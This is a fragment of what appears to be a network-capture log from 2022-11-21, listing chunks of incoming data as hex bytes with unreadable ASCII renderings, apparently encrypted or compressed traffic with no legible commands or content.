                                                                                                                                                                                    2022-11-21 18:18:36 UTC88INData Raw: 41 0c 22 e9 bf 73 af e4 80 cb 5b d3 8b 5a b7 51 85 0e 28 8a 43 88 b9 ef 65 bb cd 22 4a eb af 92 a3 04 ce cd 15 59 71 5e 50 69 31 e3 bf 3f 56 98 ad 3a 46 8a 44 43 3a 4a 7c 1a 67 99 b4 98 7c 56 43 36 83 51 6c 31 5a ff f0 16 20 22 39 e9 a7 83 94 44 d5 92 8f c7 b5 7a 3d 57 de ea 9b 93 89 76 ec 8d 0e 95 ba fc ea 71 fc b0 0f 1a 45 a5 39 cd a6 6c 28 2f 5f b7 7e 09 8d c4 91 74 af f7 7a 0d 1e d7 41 ef c0 5a 0c c0 a1 d8 f1 02 04 1c aa f8 d7 38 64 bc 73 fe d5 9b 5d 3b 67 a7 a4 10 3c ee a7 bd c8 a2 33 4d 31 1a a1 08 8a e7 23 85 d0 5a 53 7e dc 1e df d6 ca b3 1c bc 8e 03 d3 7f 88 40 eb 20 80 46 00 93 43 8e 33 b4 f2 8d 26 be 35 b6 9a e1 4e 42 48 7e 8e cc 6a c5 23 bf 57 61 40 56 a2 b6 a2 5c 03 54 6b 10 a6 aa 1b cc 73 67 85 75 7b 93 b2 9a f3 44 7d 11 b4 a0 b1 db 68 9f dd
                                                                                                                                                                                    Data Ascii: A"s[ZQ(Ce"JYq^Pi1?V:FDC:J|g|VC6Ql1Z "9Dz=WvqE9l(/_~tzAZ8ds];g<3M1#ZS~@ FC3&5NBH~j#Wa@V\Tksgu{D}h
                                                                                                                                                                                    2022-11-21 18:18:36 UTC89INData Raw: ad 1b 93 ce cb 5a d5 66 0b b3 e5 68 c6 4f c1 78 dc 9d 04 e5 aa 87 c2 34 22 2f dc 2a 0c 48 1b e3 61 a7 a8 8e b1 f4 d5 a0 1b 6f b2 a4 a4 fc dd 63 34 b3 f9 c2 97 fa 2a f2 ca bf b7 ef 44 c6 ec 3a c9 c7 7f 28 6e 32 b6 ab 45 e0 b6 66 a7 6a 8c cf 3e 31 2d 5c 90 d2 dd 5c 21 2a 09 c0 58 ef a1 37 a7 72 86 8d 6e e6 b6 8e 29 12 93 57 ae dd 32 8e bd 7c 0e 59 2d 53 84 6a 05 67 54 b4 c0 96 51 5e c8 2b c1 a2 73 31 d0 a1 98 6c b2 34 90 46 90 44 50 10 00 83 8a 16 c9 7c 0d a4 71 d6 85 eb 48 9b cc 8b 96 05 f4 67 33 bd 4e 72 1a 55 1c 1a d5 60 06 25 f1 a4 59 af d2 61 d7 b4 e8 96 27 bc 45 d0 3b cc c2 af a9 7c 3f d6 d2 29 45 72 0a 24 cf af 79 22 80 cc 5d 8d 1c 14 1b fa 4c c8 e1 e4 09 16 eb f8 f3 26 a2 52 91 80 4f df c3 dd 8a 44 eb 95 2e f6 16 a8 66 8c d9 52 a0 85 ad 3a 3a c1 b5
                                                                                                                                                                                    Data Ascii: ZfhOx4"/*Haoc4*D:(n2Efj>1-\\!*X7rn)W2|Y-SjgTQ^+s1l4FDP|qHg3NrU`%Ya'E;|?)Er$y"]L&ROD.fR::
                                                                                                                                                                                    2022-11-21 18:18:36 UTC90INData Raw: f5 48 45 b5 7d 50 3c 3a 66 78 97 e8 c0 1a 94 df ed 13 2c 5e f0 85 dc 9e ff 5d 70 33 bc a5 38 79 4d 5f 6d 51 b2 3a a4 50 d8 ac 32 d7 aa 3c d6 2c 5b 3f 33 aa d3 ac af 6c bd 67 8f 46 84 9c 3f 30 78 d6 e4 e1 de 02 8b 8c a4 f7 17 44 d4 5c d0 89 d4 a3 8d 33 2d 8f f4 a1 89 2e ee 70 16 4a e6 9c fd da 4a 8e 7b 3f a1 77 a5 65 85 12 3d 8c a3 da 13 5f cf 95 80 d4 88 c2 ab 5f 7e b3 b9 66 05 b4 9b cb e1 14 aa 5c b5 1a 57 83 bb e1 55 de b3 87 57 38 19 65 8e c1 c9 94 3e f1 f2 2d d5 ac 37 be fa fd cd d8 ee 23 c6 ef 72 7d 1c b4 e0 f3 7e 22 40 ab 41 42 f2 ed 01 9d 4d 1b b9 c1 ae 38 31 1e f9 64 11 8d 80 6f a7 8d 66 92 d5 90 db e9 0b e4 21 fb 9c a8 a6 23 2c c1 b9 16 c3 e2 a9 8a db 9d 30 e4 74 75 5f 3a 4a 7d ee f3 86 90 6b 2d c0 42 0a 1c d0 4e 77 bf 2c 5c 5b db 6a be 16 76 3b
                                                                                                                                                                                    Data Ascii: HE}P<:fx,^]p38yM_mQ:P2<,[?3lgF?0xD\3-.pJJ{?we=__~f\WUW8e>-7#r}~"@ABM81dof!#,0tu_:J}k-BNw,\[jv;
                                                                                                                                                                                    2022-11-21 18:18:36 UTC91INData Raw: ac 06 db 2f 27 33 79 75 3e 5c 66 48 e1 c0 08 7f 7a 28 a7 29 36 df 8a 3d 5b ed 03 d1 a6 40 74 bd 4d a0 53 41 0b 50 5a 20 fe 69 8c ee 58 6f 2b 32 5e d1 74 ed 9c 2d 4a 9b c2 ac fb 66 31 fc 86 ea 16 68 c3 ec 5d f6 a4 c3 f0 f2 f0 93 44 0a e7 e6 16 de 17 0c 66 92 3f a8 0c c5 43 b1 ed 7b d2 73 af ac 17 22 58 d3 35 d3 41 3a b2 cf 0c d2 14 47 6c 13 54 06 1e 46 06 d1 a9 b5 3c 40 f3 2a c6 77 a2 5a 50 a0 a8 8b 9a 62 b1 df 89 1b 60 2d ab 25 b6 85 97 34 70 fb af bb 6b 16 40 04 e9 55 ba ec 1b bb 69 8e 51 91 4a 3a 08 b1 c8 a6 9f 3c a5 40 72 db 9e 67 62 5c 4a e8 90 36 c4 16 16 af 0a bd 7a fb 1e e0 9c 7d 77 22 41 ca ba 89 61 b4 e0 64 c3 03 31 9d f9 60 57 8b 55 88 36 ab 08 fc ac 48 7a f4 61 80 a3 c9 b1 41 a2 6f 09 a9 e8 d4 d1 a3 67 b2 b6 64 ea 71 51 fb 6d eb fa f2 6a 36 c0
                                                                                                                                                                                    Data Ascii: /'3yu>\fHz()6=[@tMSAPZ iXo+2^t-Jf1h]Df?C{s"X5A:GlTF<@*wZPb`-%4pk@UiQJ:<@rgb\J6z}w"Aad1`WU6HzaAogdqQmj6
                                                                                                                                                                                    2022-11-21 18:18:36 UTC92INData Raw: 03 5a 2d 77 19 93 e3 8c d2 86 f2 f6 44 6d 54 9b f9 6c b6 e7 99 b1 16 70 f1 ee d4 88 0d c3 7a 15 f1 3b 14 f7 34 e9 5c cb f8 a3 bf f7 68 01 25 23 8a d1 2b 99 bd ca b3 5d 9a ad dd 07 80 e8 f9 90 90 60 0d d2 7f de e4 6c db a1 42 b1 dd 47 30 de f2 bc 50 1f 38 f4 e0 d6 35 5d 6e 5b 27 c4 ee 89 ad 62 c2 a3 4d 7d 7c e2 d9 ab cd ae 91 a5 82 f0 e8 13 19 ab f7 95 e4 02 84 27 0f 43 2a a1 af e6 76 c5 fd 84 fc 22 c5 5c 8e da e8 ef 92 84 4c bb 04 99 6f c1 26 a8 28 75 35 40 88 54 f0 0b 8c d1 a2 e5 b4 82 71 b4 ac a3 2a 00 10 e6 b4 26 d8 de 93 2d 17 64 43 26 32 d1 6a d9 c0 71 5d fc c7 89 03 d7 9a 77 ed f2 93 c2 60 68 03 bf 9e df 71 27 3c 3d fc c2 e7 64 fc df 91 f3 61 c6 c7 c8 b2 e4 67 c4 4d 3c 06 28 6a 3c 76 5f c4 73 8d 31 cd e0 de a0 94 01 85 44 22 2d d9 d8 91 43 b2 b4 a9
                                                                                                                                                                                    Data Ascii: Z-wDmTlpz;4\h%#+]`lBG0P85]n['bM}|'C*v"\Lo&(u5@Tq*&-dC&2jq]w`hq'<=dagM<(j<v_s1D"-C
                                                                                                                                                                                    2022-11-21 18:18:36 UTC94INData Raw: dd d1 eb 19 e2 cd 29 ec ea 24 0d a5 98 b8 50 76 47 8f e7 f9 61 e3 38 09 6c ac 4a 70 da c3 a9 85 90 39 0a 5b bd bf d3 9b a7 1b 29 e1 a6 15 6f 84 c8 b0 8f a2 6d 50 ac b5 3e f7 8c 26 60 01 84 34 6c 12 6d 73 96 54 28 59 ca a5 43 0b ed 09 c6 be 25 e0 b7 40 9a dd 82 77 a7 44 db 4a c4 25 1e 7b cf dd 62 34 0e a7 29 08 23 7f 78 25 9f a4 d9 eb 98 8d 3a 7d fd d9 68 a1 97 b9 05 f1 ca b9 76 bd 44 72 27 d6 6a f2 8c d2 d8 a1 49 a0 d9 bb 37 9d 33 60 ef 92 9a 49 82 96 58 3b 30 0c 50 5f b9 aa e5 3b 44 bb 14 0f 3d e5 78 02 d0 af 16 b4 c1 fd 4e 99 0e e7 2b 76 c6 78 5a 20 17 29 0d e3 4e e6 0c 7b 35 ee c4 d6 4c dc 30 0f 19 cb b9 84 22 1e a3 db 1c 32 ba ca 83 73 25 a1 9a 63 1d 94 b0 93 9a 4a 73 5e 78 c9 e3 ad 9d 7f 0a aa 1c a6 d1 fb f4 ae 54 45 2b 91 5b 11 60 15 a3 c8 aa 2d 36
                                                                                                                                                                                    Data Ascii: )$PvGa8lJp9[)omP>&`4lmsT(YC%@wDJ%{b4)#x%:}hvDr'jI73`IX;0P_;D=xN+vxZ )N{5L0"2s%cJs^xTE+[`-6
                                                                                                                                                                                    2022-11-21 18:18:36 UTC95INData Raw: 8b 1f a5 4f 96 62 76 9e 6d 57 a8 8c ff 76 a3 b5 a1 f5 f9 41 e4 93 af b2 ef 29 24 88 1a 37 88 fb 0a 44 66 23 88 60 b0 4b 5e 28 02 9b d6 2c c1 8c a2 95 e7 b3 7c 7c 12 5e db d7 de a6 aa fe 42 7f 14 ee ad 90 97 be 61 39 36 5a 51 43 1a b5 2f ae 88 64 47 9e 64 f9 11 07 d6 61 c0 6a 79 56 10 d8 73 0b f9 99 c1 70 84 cc c6 05 72 ce 9c 8d 56 0a a8 ea ec 4b 58 f4 30 16 bd 82 36 dd ef 3a d3 51 5e aa c6 f9 1f 92 80 7c ce 96 66 5f 4e 03 1e 32 1a 54 93 c4 9a aa fd 9c d8 40 8c 06 f6 3f 6f 17 74 cc 83 fc ca 9b 89 f5 9b f9 19 e4 6e e2 60 d5 f0 6a 80 14 95 6e 91 94 7b e7 11 47 20 0c eb 29 b8 51 80 d0 7a aa 4a a3 3c dd ac 47 11 c1 30 8d e1 98 06 c6 1f a4 ce 0c 89 ca 51 be 7d 54 20 06 12 8e 1d cf d1 db 99 37 2c 6b f9 eb 24 82 8c ba 9a 30 45 c9 13 dc d1 ca ea df ed 63 75 c3 61
                                                                                                                                                                                    Data Ascii: ObvmWvA)$7Df#`K^(,||^Ba96ZQC/dGdajyVsprVKX06:Q^|f_N2T@?otn`jn{G )QzJ<G0Q}T 7,k$0Ecua
                                                                                                                                                                                    2022-11-21 18:18:36 UTC96INData Raw: e1 13 f3 17 80 9d 68 a4 42 73 bd 08 05 f7 9b 5d 36 9c 20 0d b9 17 d4 fe 9e 66 db 68 3c 8e 8b ad 3b dc 71 62 d7 7a 76 ee 44 1e 76 69 a0 ee 62 1c 9b e6 9c b1 5a 9c 58 89 21 e7 40 e9 09 40 c6 6f e5 c3 5b 7f e1 17 29 39 cb 9d b9 09 32 ed 7c 4b 58 d8 0f 68 ff 20 64 0a 01 c6 47 7d fc 9a 97 13 2c 6f 03 82 d8 c2 4e d3 24 33 e9 3a 9c 03 c4 a7 bb 25 e0 04 ab 9f 5d 46 cc 10 97 b2 d3 b3 28 32 8a 3c a0 ba 46 be b7 83 df b9 c0 cf 95 ae 67 b8 88 ab bb 4f 9e c3 16 4b 62 42 cd ea e4 59 ac 3c 4b cc 78 ed 3f 7b 9c 49 81 23 c9 9c 5d 40 af ad 2a 1e 8c d8 2f c2 1f c0 be f4 8d d8 80 7c 17 4b d7 0a 73 fa 4e 3f eb c7 82 3e 0e 0e 88 a1 b8 94 b4 5a 71 a1 d4 d0 b0 54 3b 58 62 a1 40 49 0e 8e 4d 34 c8 a5 10 31 af 55 1c 10 17 23 c6 18 fa 42 5d 83 25 9e 65 db 7b dc a3 1d b9 65 54 0e 70
                                                                                                                                                                                    Data Ascii: hBs]6 fh<;qbzvDvibZX!@@o[)92|KXh dG},oN$3:%]F(2<FgOKbBY<Kx?{I#]@*/|KsN?>ZqT;Xb@IM41U#B]%e{eTp
                                                                                                                                                                                    2022-11-21 18:18:36 UTC97INData Raw: 0e ff e5 fe 07 a9 8f 3c db e8 e5 2f 77 e4 35 91 1d ac 2f 13 98 2e b6 3e 04 de 89 18 89 9f 7c a5 ed 9d f6 ee c0 9f 6d e4 40 bf 26 57 6a c9 3a 16 3c 08 1e 55 c3 5c ef 95 a7 3a db 07 9b 66 91 30 53 32 fc 31 d0 6c ff 86 57 6d 6a 88 53 e9 2b 27 e6 ba d4 28 de 3e e2 40 d6 f2 a7 93 38 83 be 52 f2 ec 9d 44 5e 1d bb e3 e4 59 ad bc
                                                                                                                                                                                    Data Ascii: </w5/.>|m@&Wj:<U\:f0S21lWmjS+'(>@8RD^Y
                                                                                                                                                                                    2022-11-21 18:18:36 UTC97INData Raw: 17 bd 4f 59 15 29 4a c9 ef c6 79 b9 47 e8 72 58 ee fb d4 ec 1b 30 b3 ed cb 0f 5d d6 07 22 62 2e 4d 36 09 5b cd 85 92 d4 da c4 8c 3b 6a b2 dc a6 7b 2d 23 08 1e e5 26 90 78 b4 33 bb e3 6c 62 d7 7e be 21 66 70 b6 15 1b e4 e8 ea a8 cc 33 00 ee 3c 95 4d 10 3a 7f de 26 72 4b 29 69 01 7e 0c b6 94 3a eb 42 94 ff 01 65 f1 31 3e f3 30 79 f5 17 a9 52 39 68 a0 0d e8 62 e6 6c 64 11 cd 72 c3 16 ab 6f ee a4 9d aa cc 4b 47 c5 e7 29 3b 4b f5 0b 66 27 f4 fe 7b 04 6f c8 a1 b1 c6 05 8f ac ad 14 bb 5d 2b 2d 3d 70 f4 63 c5 9f c0 bb 5d e5 ad 08 a3 3e 4f b9 b8 47 ca 69 05 d6 70 f7 31 01 99 1f cc bd e4 1c a7 83 5f cd 38 40 20 51 be 6e 90 6f 12 6c 38 25 b0 53 56 fe ee 30 f3 13 e7 9b 9d 44 b9 81 9e 32 e2 81 bd ba 2f 9d b7 c5 72 a5 b5 f5 9c de e4 f0 03 da 77 55 32 ff 44 2c da 07 0f
                                                                                                                                                                                    Data Ascii: OY)JyGrX0]"b.M6[;j{-#&x3lb~!fp3<M:&rK)i~:Be1>0yR9hbldroKG);Kf'{o]+-=pc]>OGip1_8@ Qnol8%SV0D2/rwU2D,
                                                                                                                                                                                    2022-11-21 18:18:36 UTC99INData Raw: 4b 26 04 39 dd 5f 89 2a ca f7 55 6f fc 52 54 6b ff ab 91 41 9e 80 09 81 6f 58 32 b5 67 3d c4 47 ac bd c0 21 ac 4f 03 00 72 19 f0 b0 81 6c 9e 53 6e 47 3e 2b a2 51 c1 87 6e 6b 83 e6 78 d0 a6 6b 9a 79 da c4 8a da b0 d6 e5 72 3c 57 da 0b da 89 a3 79 e0 24 13 c7 c9 17 7a 0c 0f 6b 38 73 fc 97 84 a7 cd 41 4e 67 85 fa fb 35 5d 7c 25 eb 7d 3a 16 bd bc c3 09 95 64 2d 8d eb 1e a1 6d 8e 26 0a 6e e1 de cd 9f 47 1f 31 48 3c aa 48 29 87 b5 04 96 a7 e9 c5 ff 4f 1d 9d 3a 0b e0 33 7a 26 0d d9 3f 3d 5a 39 58 25 97 01 7c 14 9a a1 1c b8 68 cb bd 9f 80 be 0c 6a 42 cb d3 79 ff ed 44 c3 64 cf d6 96 6c 0f 6b a6 53 70 72 79 d4 00 6b 51 db ef 43 75 87 e2 96 5a 2c b2 35 04 5f e7 a6 06 a1 6b 04 e8 33 6c d2 1f 00 62 5e 2d a5 2c 26 ab 95 82 4b fd c0 b4 76 df 1e fe 98 3a 74 64 f8 d5 9c
                                                                                                                                                                                    Data Ascii: K&9_*UoRTkAoX2g=G!OrlSnG>+Qnkxkyr<Wy$zk8sANg5]|%}:d-m&nG1H<H)O:3z&?=Z9X%|hjByDdlkSprykQCuZ,5_k3lb^-,&Kv:td
                                                                                                                                                                                    2022-11-21 18:18:36 UTC100INData Raw: dd bd 18 e2 05 ee 8a c4 7e c5 34 74 5a 5b d3 9f e3 5b f8 f0 12 c5 2e db c6 fc 8f 4e 0c 4e 58 fb a0 54 00 06 d9 28 72 7d 0b 9f 79 d3 df 7a 7c 6f 43 a8 78 80 42 9e 06 34 66 4d 59 46 7c eb c8 2d 4d f8 a6 06 35 4c f0 b6 83 33 81 db 36 88 a8 1b be 13 9a 4b b9 32 b4 9b 4a a1 16 13 e4 c1 25 0a c5 4c 94 da 4d 49 57 c5 44 f4 af 20 68 83 65 55 95 41 7a 87 c4 80 a1 b1 ab 4c 00 96 86 03 8a 0a a5 22 7f 0d 54 69 c5 ce d8 3d e7 b7 25 40 60 a5 59 a8 d6 2c 01 3b 77 81 5a a7 0a 4c 22 b7 68 81 02 7c 1a 42 15 dd e2 15 f3 4b 05 61 b3 a7 d2 4b 94 4c 7d 92 28 12 e4 3d cd ed f8 f7 cb 30 b4 3c a9 0e fe 93 20 b6 40 30 b0 65 da 30 58 cf 45 e5 ee ac 94 73 4c 03 6a fd 47 06 51 1b 24 90 3b 22 8b df 2e d8 b3 28 5b 08 f7 8f fc 4b c3 5a 2b 8f 34 ef 86 09 bf 76 78 fb 7d bc cc da 60 e3 60
                                                                                                                                                                                    Data Ascii: ~4tZ[[.NNXT(r}yz|oCxB4fMYF|-M5L36K2J%LMIWD heUAzL"Ti=%@`Y,;wZL"h|BKaKL}(=0< @0e0XEsLjGQ$;".([KZ+4vx}``
                                                                                                                                                                                    2022-11-21 18:18:36 UTC101INData Raw: 41 7c b7 1a e4 2c 09 23 b3 61 6a 7a 25 84 26 53 05 2b 24 49 a0 11 b9 6e 56 a0 1c ee 39 c7 21 54 c3 4a 41 25 85 2b fe 2d 2d 45 ae 2a cb f2 b4 ff 90 f1 61 d6 89 18 af 4d ef 13 11 cb b3 2a 2f 3e 15 0a 29 c1 aa 78 4e a6 ab 16 13 88 45 d5 05 32 c5 aa 6a 73 7e 3a b9 fb e5 b6 4e f4 f6 12 2e d3 c5 22 f4 cd 86 5f 42 9f b7 93 73 77 96 69 a2 fd d4 ac e1 d1 df bf db 97 07 c6 ad 44 95 fe 88 a2 5f ec 8c 5d f5 a3 0d 2b 62 da 1c 84 38 a2 f3 68 4b 11 a8 e7 f3 fa ed 85 a4 fb c0 04 fe f0 29 81 07 aa 20 d0 87 5b 4d e6 d8 b1 28 40 9f 0a a5 65 07 fa 9d 5b 0a a7 bd d2 11 c9 87 28 ec f1 55 ff 48 dc 53 ab 3c 12 41 74 22 f9 14 09 3b cd b6 bb c1 1c 72 96 c8 3f a4 66 e8 a4 09 b2 84 81 8b 0c 3a 1a ce 24 b3 9b a6 73 89 a5 2e 1f 91 a1 33 fe a0 45 73 14 07 05 2e 46 f5 22 0a 8e d2 4b cf
                                                                                                                                                                                    Data Ascii: A|,#ajz%&S+$InV9!TJA%+--E*aM*/>)xNE2js~:N."_BswiD_]+b8hK) [M(@e[(UHS<At";r?f:$s.3Es.F"K
                                                                                                                                                                                    2022-11-21 18:18:36 UTC102INData Raw: 53 b2 74 e5 79 bb 0d a4 56 58 02 15 af b6 56 63 15 ef 92 0f 12 e3 a9 8b 75 a1 09 b3 15 bc 79 35 13 c0 ec dd 1f 78 a6 82 9b 7c 6a 2d d3 09 eb 08 3f e4 9a 2c 1f 16 12 6f 61 f8 9e 46 f0 e3 33 48 d3 47 49 3f 4f 76 bd 03 68 f2 bf 36 73 e3 30 0d 06 96 9a 0c 3f 29 aa a7 4b b5 8f 73 39 db 73 67 8c 31 75 21 88 4b 84 40 fb 44 9a fa f6 19 90 7d 77 35 0a 71 0d 12 0b b3 21 01 88 f9 32 49 3f 02 6e ef d7 31 f3 42 80 a9 44 09 69 e8 41 a8 20 60 13 91 67 1e 28 b0 e5 d7 2f 89 27 7e 2a d2 3a 8c 28 3b e8 41 81 f8 1c 94 46 95 3d 3c 96 4d 24 c1 7f 28 b6 8b 90 1d 5d 03 0f fe 40 9b 3f 4f 88 21 4c f7 2d 2d 13 2a 89 30 cb 07 fe 1f fe 8b 5c 4f dc 78 e1 08 37 fb 38 95 66 c3 9a d1 c9 b2 35 6b 20 1a ed dc a4 29 fd 99 08 4d 78 67 20 bb 6a 38 9e 27 cb db 80 c4 56 99 33 67 07 1d df 8d 76
                                                                                                                                                                                    Data Ascii: StyVXVcuy5x|j-?,oaF3HGI?Ovh6s0?)Ks9sg1u!K@D}w5q!2I?n1BDiA `g(/'~*:(;AF=<M$(]@?O!L--*0\Ox78f5k )Mxg j8'V3gv
                                                                                                                                                                                    2022-11-21 18:18:36 UTC104INData Raw: 90 12 a2 4c 7a be 18 26 e1 23 26 c7 15 ba 42 e4 28 79 9a 0b 67 9a 78 6e 56 f8 d4 02 73 fd ea a4 ac 05 4e 6b bf 7a 5a 35 a2 cd 8b 8a 17 cf de 7a 99 1a 9c 7e ec 89 47 47 cc 87 f4 d8 3a f8 6c 93 f2 2b 89 5d 34 42 cf d4 81 69 1b 9f 2a 9e bf fb ae d6 6c 3f 49 47 eb ac f6 48 93 9a a8 f5 fe e0 53 56 e5 bc 56 47 18 8f 68 91 47 06 75 3f 37 0c 0a 8f 63 df 24 ed 30 f1 04 fd 34 f5 c0 87 17 6d 1f 0c 9c fc 9f 2e e1 72 0d e6 36 bd 62 94 50 a8 53 26 b0 b9 85 da a4 d8 36 ef d2 2c 66 ed 25 73 51 df fe 0c 14 41 31 4b 81 e3 b2 ae c5 f7 d7 a1 de 29 9d 3b 92 cc 6e 9b 98 2f 80 48 4c 09 de 52 b5 15 53 1c 4b ff e9 c4 bd 7a 77 16 17 a2 eb f6 32 37 f4 83 f8 80 ab dc 1c 75 d8 6a bd 6f 75 de 74 4b 6a bf fd ad 48 be 2c e8 32 e1 b3 8b 5f 47 dd 9b 0f 10 ae 5b f2 f0 43 3c 6f f7 fd 41 84
                                                                                                                                                                                    Data Ascii: Lz&#&B(ygxnVsNkzZ5z~GG:l+]4Bi*l?IGHSVVGhGu?7c$04m.r6bPS&6,f%sQA1K);n/HLRSKzw27ujoutKjH,2_G[C<oA
                                                                                                                                                                                    2022-11-21 18:18:36 UTC105INData Raw: 5d b4 7c 3e 14 45 4a b0 ef 29 93 44 dd 49 17 90 52 a1 cc 28 4c b5 8a 4c 85 bd 23 5a 14 2f be 2a fb 09 01 93 4b 97 2f 04 d6 64 40 ca dc 81 4a 0a fe 9c 09 bf a7 14 91 60 29 42 ae 7f a8 d1 1f 89 6c 35 00 1c 58 5b 93 12 6c b0 6b 6e 9c ff 26 c3 c6 3f a5 29 60 d4 9c 74 ed c7 e9 7c 90 fa cd 79 00 ce eb 83 2f e7 09 2a ec 6b dc 8e da 2c 7d 0c ae a0 7d 35 b2 5a c7 3b 6f 22 71 21 d2 18 fb cd 10 43 49 c7 ed 3b 37 dd 0b 94 fc b3 96 e3 d4 1b a7 b1 11 fb 19 29 31 88 6c 64 b8 5b 64 89 b8 49 c2 f9 0d ff bc 0f e9 01 6c 0f 6a 9e 2d e4 e8 27 81 b2 25 5d 64 0e f0 62 57 e9 ca ee f4 ce 3e df d5 d3 34 7c 42 eb 57 b8 91 af 11 0e 85 0c f2 a7 38 5f 3f b3 a8 28 42 2f 27 20 39 85 44 c7 c1 6d b9 12 a3 5b 27 c8 7e 7c 2b 91 fe 0e fd dc b5 6b ae c8 ff 15 4c da 4a 70 e6 3b 41 12 6c eb 24
                                                                                                                                                                                    Data Ascii: ]|>EJ)DIR(LL#Z/*K/d@J`)Bl5X[lkn&?)`t|y/*k,}}5Z;o"q!CI;7)1ld[dIlj-'%]dbW>4|BW8_?(B/' 9Dm['~|+kLJp;Al$
                                                                                                                                                                                    2022-11-21 18:18:36 UTC106INData Raw: cc 37 78 da 2c fa 34 e2 5c 62 dd 50 81 67 4a 52 b9 0c 4c 69 4f 8f 55 08 20 8d 0d cf 2e b0 67 1b 64 c5 55 1b 07 7a a7 13 40 13 ff e9 2f 72 f2 86 67 a1 86 d5 b5 93 c5 36 46 9a f5 dd fb ec 9b fa 85 77 08 2f 38 3c a2 e7 60 c4 a6 39 02 b2 a0 01 12 8c 97 b3 29 ad f2 5f 16 9f 45 1a ff c5 38 89 52 ce a7 17 79 32 d5 35 d5 2e 93 36 80 73 c4 18 ba 36 79 b3 98 27 eb a7 cc 59 52 19 e5 38 87 e8 74 9b 8e b2 7d 88 b0 c7 45 9d 18 d5 16 51 1a 10 0e 6c 94 ea da 4a 1a 2a ff d3 b6 ce 62 60 af cc 4d a3 a9 9f 48 63 c2 2c 46 2f 1b b6 70 d2 40 d6 cc 87 80 c1 ba 71 02 c7 c5 8b 9e ef 9d db 86 3e dc 29 53 53 db b4 0c c0 d6 04 42 d1 4a 72 2b 1a 1f 36 ad ce 29 67 5c da 15 1e bd ac 5e 9f d9 c8 bd 32 c0 4c be 31 10 cb 54 a0 65 8d dc 93 b3 81 aa 34 99 4e af ca d6 cf ce a4 08 bb cd 0d ad
                                                                                                                                                                                    Data Ascii: 7x,4\bPgJRLiOU .gdUz@/rg6Fw/8<`9)_E8Ry25.6s6y'YR8t}EQlJ*b`MHc,F/p@q>)SSBJr+6)g\^2L1Te4N
                                                                                                                                                                                    2022-11-21 18:18:36 UTC107INData Raw: e4 7c 0a 1f 38 a6 a2 db 5f 03 18 50 41 02 76 27 93 43 a8 cb 8c 12 e7 52 fe 7e 64 38 77 6f 10 92 96 1b 25 57 ba 6e 25 56 33 a0 5b d3 54 5f 3f 10 18 8c 61 8d e1 06 06 8e 45 6b 60 e0 fc 28 d6 47 53 f6 16 e4 0f 1c 26 0b b8 c9 1c 75 91 eb 4f 13 82 d5 89 a3 21 f7 37 2b 19 7b 11 76 4e 5b fd c4 a2 55 85 8c d6 c9 e2 55 45 14 7c 75 cf 29 87 9c bc fc d1 7b 3a 8d 4b 69 69 e8 b6 64 4d a0 b3 63 21 86 a5 6b 36 2c 94 4a 3f ad 16 51 b1 ff a2 33 0d 9a ec a4 d6 4d 63 d9 c5 22 c0 ae 66 3d ec 6f a5 b1 06 3d 48 42 45 b1 ab 69 07 c2 33 d9 c4 88 5f 1b 25 a5 d5 a2 dd 03 77 6c 37 ab 75 65 de 79 34 e1 1d f8 51 d9 4a ab d3 0e 5c 29 74 22 22 de 9b 19 0b 0a b5 f6 d5 05 9d b2 09 83 8f b3 0a ba d0 84 9e 7a 67 01 f4 da 2d 73 22 c1 9e af 89 a5 30 ee a6 44 ca 84 d9 03 89 f1 5f 31 ca 6e ed
                                                                                                                                                                                    Data Ascii: |8_PAv'CR~d8wo%Wn%V3[T_?aEk`(GS&uO!7+{vN[UUE|u){:KiidMc!k6,J?Q3Mc"f=o=HBEi3_%wl7uey4QJ\)t""zg-s"0D_1n
                                                                                                                                                                                    2022-11-21 18:18:36 UTC108INData Raw: 2a 81 c3 2c 30 31 2f 61 5d 71 4c fb 43 6f ac 22 32 a3 09 18 14 e6 23 1a 61 36 77 2a 43 02 0f 27 d8 17 45 a0 51 2b 83 ec 52 14 34 94 65 bb 99 a9 ca 8c af c9 cd 0d b6 b0 32 d1 ac b4 13 5e 56 15 84 c4 76 f4 43 39 93 32 ea 1a 7f ce e8 9a 79 51 8d d1 8b 19 62 f2 1b 4c 33 e3 81 0c 18 16 b9 bf 74 6e 7d 1d 49 a7 cb ab 2e 05 64 87 35 be 88 ec 45 8b 26 d9 eb c1 2d ec 32 8d b3 24 2c aa 53 6e c0 db 98 cb 47 92 e6 f6 da a0 b7 42 70 8b fb c7 3e fe 67 60 26 d4 e8 36 0c 04 03 50 ed af a6 f6 31 48 e6 b6 02 5d af 98 7c aa d7 8c 76 d0 97 17 cc 1b 22 54 ce cc bc 07 fa a5 b5 fa 33 a7 e9 1b dd 0b 5a a9 59 fb 49 3d 36 2b 7f 9a 19 34 1d 0e ea 9a 4e 6f 55 d1 19 1f b0 3b 16 2b bc 04 41 d8 c2 25 a1 7e 74 61 38 0a 53 e7 ec a9 c1 8d eb 40 4d ca ca 40 e6 92 e6 48 73 aa 62 63 73 bb 92
                                                                                                                                                                                    Data Ascii: *,01/a]qLCo"2#a6w*C'EQ+R4e2^VvC92yQbL3tn}I.d5E&-2$,SnGBp>g`&6P1H]|v"T3ZYI=6+4NoU;+A%~ta8S@M@Hsbcs
                                                                                                                                                                                    2022-11-21 18:18:36 UTC110INData Raw: 3a 85 68 69 8f 8f 6d 9c 9c ec 8c 5c 3f 04 8b d5 bc 7f 93 8f 50 ac e5 6f 7c 06 32 6e 42 b1 57 00 31 79 12 b8 fb fb 03 09 93 46 a8 33 79 32 f7 e6 02 cd 31 d4 bc 63 19 03 7b a3 de d5 10 fb cf 3c dd a1 a5 29 d5 09 05 76 1f 59 84 95 d0 3c f2 95 14 b6 a6 44 38 16 9a 88 4f 6b 47 ad 93 da c7 7b d6 05 e9 ed 55 78 0b 68 9e 27 e8 e9 fb d1 95 62 fa db 39 e4 a5 ec 3c 73 49 78 0d 0f 3f 5c 1f d3 c4 6e c2 4c 67 e9 f6 31 cd bc 52 98 b1 20 52 27 e4 86 a7 e3 00 78 68 ed c7 5a 54 f2 86 e7 de 04 6c f4 4c 13 23 b3 c9 da 78 3f 69 55 fe 0c 04 6a 14 a5 11 ca 94 ea a3 bf 2b 9e 61 e2 c2 87 82 e5 d5 f7 80 98 5a 5c cc 62 2c 16 00 55 60 9d 09 99 03 fd 59 14 b6 1c a9 12 06 6f a0 1b 22 3d d4 db bd fe 60 62 32 f4 17 6a 42 ad 50 66 81 b1 22 d8 cd 16 4d f3 bf 1b c4 3b 8f 39 d8 e9 11 76 82
